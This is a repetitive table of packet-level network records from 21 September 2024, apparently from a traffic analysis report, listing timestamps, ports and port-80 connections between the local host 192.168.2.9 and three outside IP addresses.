                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307466030 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307492018 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307507992 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307516098 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307516098 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307523012 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307538986 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307564974 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307564974 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.307636976 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.332803965 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333100080 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333113909 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333137035 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333153009 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333159924 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333169937 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333189964 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333190918 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333208084 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333323002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333344936 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333347082 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333364964 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333379030 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333381891 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333395958 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333406925 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333412886 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333427906 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333431005 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333445072 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333460093 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333461046 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333508968 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.333508968 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.335988045 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.336004019 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.336018085 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.336033106 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.336050034 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.336066008 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.336076975 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.336123943 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.347326040 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.347399950 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.347460985 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.347476959 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.347604990 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348119974 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348135948 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348150969 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348165035 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348182917 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348189116 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348248959 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348248959 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348922968 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348937988 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348953009 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348968983 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348984957 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.348999977 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349014044 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349015951 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349015951 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349030972 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349042892 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349052906 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349052906 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349059105 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349086046 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349098921 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349098921 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349098921 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349117041 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349128962 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349142075 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349155903 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349159002 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349159002 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349172115 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349188089 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349196911 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349196911 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349205017 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349220991 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349221945 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349221945 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349237919 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349240065 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349253893 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349268913 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349280119 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349280119 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349289894 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349297047 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349312067 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.349343061 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.350939035 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.350953102 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.350966930 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.350982904 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.350997925 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351027012 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351027012 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351188898 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351214886 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351229906 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351244926 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351258993 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351274967 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351285934 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351285934 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351361990 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351361990 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351377010 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351407051 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351449966 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351465940 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351466894 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351480007 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351495981 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351510048 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351510048 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351511955 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351528883 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351542950 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.351666927 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.353915930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.353939056 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.353954077 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.353970051 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.353996038 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354011059 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354017973 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354027033 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354043007 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354046106 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354060888 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354063988 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354101896 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.354101896 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.355762005 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.355777025 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.355792046 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.355807066 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.355822086 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.355829000 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.355870008 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356070995 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356086969 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356131077 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356177092 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356194019 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356208086 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356215954 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356225967 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356241941 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356256962 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356262922 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356272936 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356287956 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356303930 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356303930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356322050 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356343985 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356343985 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356396914 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356484890 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356499910 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356514931 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356523991 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356529951 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356545925 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356548071 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356563091 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356564045 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356580973 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356583118 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356596947 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356611013 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356612921 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356664896 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.356664896 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357570887 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357588053 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357601881 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357616901 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357620955 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357635021 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357649088 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357651949 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357667923 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357685089 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357693911 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357693911 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357700109 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357716084 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357728004 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357731104 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357748032 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357757092 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357764006 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357780933 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357780933 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357805967 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.357837915 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359249115 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359266996 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359281063 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359296083 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359311104 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359354973 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359354973 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359359980 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359378099 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359402895 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359407902 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359425068 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359432936 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359443903 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359448910 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359462023 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359477997 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.359498024 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.361161947 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.361177921 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.361195087 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.361207962 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.361253977 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.361254930 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362515926 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362531900 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362548113 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362564087 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362611055 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362611055 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362670898 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362685919 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362770081 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362787008 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362790108 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362802029 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362817049 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362832069 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362837076 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362848043 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362864017 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362869978 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362869978 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362957954 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363167048 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363182068 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363197088 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363212109 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363228083 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363243103 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363260031 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363271952 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363277912 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363316059 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363316059 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363346100 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363522053 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363537073 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363550901 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363565922 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363581896 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363581896 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363605022 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.363610983 CEST4970880192.168.2.9147.45.44.104
